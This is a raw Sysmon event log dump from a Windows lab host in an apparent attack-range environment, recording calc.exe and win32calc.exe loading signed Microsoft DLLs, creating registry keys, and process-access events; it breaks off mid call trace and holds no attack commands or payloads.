CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057349372Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.281{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValid 734700x800000000000000057349371Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.281{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057349370Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.281{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x800000000000000057349369Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.281{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057349368Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.281{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x800000000000000057349367Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.280{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057349366Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.280{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValid 734700x800000000000000057349365Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.280{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057349364Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.280{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057349363Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.280{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValid 734700x800000000000000057349362Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.279{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057349361Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.279{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=D287E1BC5A148E2BCB482DBD0E925738,SHA256=1C2428AD170165DD8DE960C835D9AAB5B268300A676FE935B177ED5D2607430DtrueMicrosoft WindowsValid 734700x800000000000000057349360Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.279{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057349359Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.279{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x800000000000000057349358Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.279{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057349357Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.279{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x800000000000000057349356Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.278{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x800000000000000057349355Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.278{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057349354Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.278{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\gdi32full.dll10.0.14393.4530 (rs1_release.210705-0736)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=9D82D7DBC3D9E0D8E86D10A5B1BF736E,SHA256=270CA1A42ECB4C22E826C1C95924F0014CC99254AB55B7167DA144D45E238E6DtrueMicrosoft WindowsValid 734700x800000000000000057349353Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.278{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x800000000000000057349352Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.278{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 734700x800000000000000057349351Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.277{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=F9E249B6BB80C06BA30A61854567796C,SHA256=E5F62CD5D2FE7BE8D4E029ECA004A8773FF8D1F7AB92C115810AD54B5B8F50CAtrueMicrosoft WindowsValid 734700x800000000000000057349350Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.277{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057349349Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.277{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x800000000000000057349348Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.277{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057349347Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.276{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\advapi32.dll10.0.14393.4467 (rs1_release.210604-1844)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=A8CDCAC5C32D14ED8AADDF5489FC5D55,SHA256=140F07A8F6780DAFE20CC4FBE86C9332FB2F0C26ED8F49914BD05265C63EF6F1trueMicrosoft WindowsValid 734700x800000000000000057349346Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.276{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057349345Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.276{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValid 734700x800000000000000057349344Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.276{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 734700x800000000000000057349343Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.276{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=8AAF6E1B14B9210052FFF90E25926D63,SHA256=F2120C8E63EA94F8618B31319A534731C16D8FDD58B0E1E70217D72A39D78353trueMicrosoft WindowsValid 534500x800000000000000057349342Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.275{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe 734700x800000000000000057349341Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.275{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4467 (rs1_release.210604-1844)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=B0C4BF9491FB453B77399E3C56C11DC8,SHA256=66D5D1B3D25D15EA8737C8B2EF83E770BA10931868F24DCACC50936F0A0BAC08trueMicrosoft WindowsValid 734700x800000000000000057349340Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.275{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057349339Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.275{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x800000000000000057349338Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.275{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057349337Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.275{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\combase.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=878EBD02A580FDF8F187100127E6D3A8,SHA256=54E4BADDFBD97CFFF871B6D7316B28872218B92F37C41199F71EB37BC5634216trueMicrosoft WindowsValid 734700x800000000000000057349336Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.274{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057349335Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.274{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=1D7997E3AFC26B85024D33F835E18056,SHA256=B2376967E156D4971FB66059F6367030AF937943D2EBF80AF856E643B6E95BBFtrueMicrosoft WindowsValid 534500x800000000000000057349334Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.274{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe 734700x800000000000000057349333Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.274{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValid 734700x800000000000000057349332Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.273{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x800000000000000057349331Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.273{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=837B8644B9CE47EC28152E7D764886E0,SHA256=C5BA64473FB38E6B4592EAFA642AF82715CBC676190985D8D8D4150CE840044FtrueMicrosoft WindowsValid 734700x800000000000000057349330Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.273{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x800000000000000057349329Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.273{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057349328Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.272{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 734700x800000000000000057349327Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.272{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 12241200x800000000000000057349326Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.272{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings 12241200x800000000000000057349325Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.272{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings 734700x800000000000000057349324Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.271{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x800000000000000057349323Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.270{8B6011A9-5BAC-618E-5FF3-04000000F101}9388C:\Windows\System32\win32calc.exeC:\Windows\System32\ntdll.dll10.0.14393.4530 (rs1_release.210705-0736)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=36B87C41EE39F3051D116F735EBEF866,SHA256=9C45BAE6D7E27B3AE04BBF88B96686C04ED6A43695558E82B687013BA0383F8AtrueMicrosoft WindowsValid 10341000x800000000000000057349322Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.270{8B6011A9-888A-6164-7000-00000000F101}34483876C:\Windows\system32\csrss.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 12241200x800000000000000057349321Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.270{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings 12241200x800000000000000057349320Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.270{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500_Classes\Local Settings 10341000x800000000000000057349319Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.270{8B6011A9-5BAB-618E-5BF3-04000000F101}94688040C:\Windows\System32\calc.exe{8B6011A9-5BAC-618E-5EF3-04000000F101}9620C:\Windows\System32\win32calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+89d2f|C:\Windows\System32\windows.storage.dll+899a5|C:\Windows\System32\windows.storage.dll+89496|C:\Windows\System32\windows.storage.dll+8a908|C:\Windows\System32\windows.storage.dll+892be|C:\Windows\System32\windows.storage.dll+8c0d5|C:\Windows\System32\windows.storage.dll+8c454|C:\Windows\System32\windows.storage.dll+8ba90|C:\Windows\System32\windows.storage.dll+8e30a|C:\Windows\System32\windows.storage.dll+8e0c2|C:\Windows\System32\SHELL32.dll+3f8fd|C:\Windows\System32\SHELL32.dll+3e496|C:\Windows\System32\SHELL32.dll+80201|C:\Windows\System32\SHELL32.dll+6719e|C:\Windows\System32\SHELL32.dll+3d473|C:\Windows\System32\SHELL32.dll+3d33b|C:\Windows\System32\SHELL32.dll+3cc57|C:\Windows\System32\SHELL32.dll+dcb6e|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNE